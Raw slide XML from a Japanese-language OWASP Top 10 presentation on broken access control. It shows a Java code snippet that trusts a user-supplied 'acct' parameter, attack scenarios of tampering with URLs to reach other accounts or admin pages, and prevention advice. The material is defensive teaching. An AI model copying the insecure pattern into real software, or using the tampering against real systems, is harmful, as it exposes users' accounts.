                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("acct"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00206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ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者は、単にブラウザでパラメータ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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acct'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を任意のアカウント番号に改変して送信します。適切な検証がない場合、攻撃者は任意のアカウントにアクセスできます。</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002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">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#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ある攻撃者は、ブラウザで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を指定してアクセスします。管理者ページにアクセスするには管理者権限が必要です。</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http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">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ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>認証されていないユーザがこれらのページにアクセスすることができるなら、欠陥があります。管理者でない人が管理者のページにアクセスできるなら、それも欠陥です。</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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アクセス制御はユーザが予め与えられた権限から外れた行動をしないようにポリシーを適用します。ポリシー適用の失敗は、許可されていない情報の公開、すべてのデータの変更または破壊、またはユーザ制限から外れたビジネス機能の実行につながることが多いです。一般的なアクセス制御の脆弱性は以下のような場合に発生します</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、内部のアプリケーションの状態、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ページを変更することやカスタム</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻撃ツールを単純に使用することによって、アクセス制御のチェックを迂回できてしまう。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主キーを他のユーザのレコードに変更することができ、他のユーザのアカウントを表示または編集できてしまう。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>権限昇格。ログインすることなしにユーザとして行動したり、一般ユーザとしてログインした時に管理者として行動できてしまう。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>メタデータの操作。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSON Web Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）アクセス制御トークンや権限昇格するために操作される</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>フィールドを再生成または改ざんできたり、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>の無効化を悪用できるなど。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>の誤設定によって権限のない</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アクセスが許可されてしまう。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>認証されていないユーザを要認証ページへ、一般ユーザを要権限ページへ強制ブラウズできてしまう。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>メソッドへのアクセス制御がない</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>へアクセスができてしまう。</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lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</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Access Controls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 V4 Access Control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Authorization Testing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Sheet: Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId9"/>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CWE-22: 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CWE-284: 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CWE-285: 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CWE-639: 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4"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>: 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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者がアクセス制御のチェックやメタデータを変更することができず、信頼できるサーバサイドのコードまたはサーバレス</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>で実施される場合にのみ、アクセス制御は機能します。</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公開リソースへのアクセスを除いて、アクセスを原則として拒否する。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アクセス制御メカニズムをいったん実装すると、アプリケーション全体でそれを再利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>する。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>の使用などは最小限にすること。</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アクセス制御モデルは、ユーザがどのようなレコードでも作成、読取、更新、または削除できるようにするのではなく、レコードの所有権があることを前提としなければならない。</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アプリケーション独自のビジネス上の制約要求はドメインモデルに表現される必要がある。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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>サーバのディレクトリリスティングを無効にし、ファイルのメタデータ（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>など）とバックアップファイルがウェブルートに存在しないことを確認する。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アクセス制御の失敗をログに記録し、必要に応じて管理者に警告する（繰返して失敗しているなど）。</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レート制限する</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>とコントローラは自動攻撃ツールによる被害を最小限に抑えるための手段である。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JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>トークンはログアウト後にはサーバー上で無効とされるべきである。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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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開発者と</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>QA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>スタッフは、アクセス制御に関する機能面での単体及び結合テストを取り入れるべきである。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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アクセス制御の不備</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3577650402"/>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a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</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1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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ja-JP" altLang="en-US" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アクセス制御の悪用は攻撃者の基本スキルです。 静的ソースコード解析ツール</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
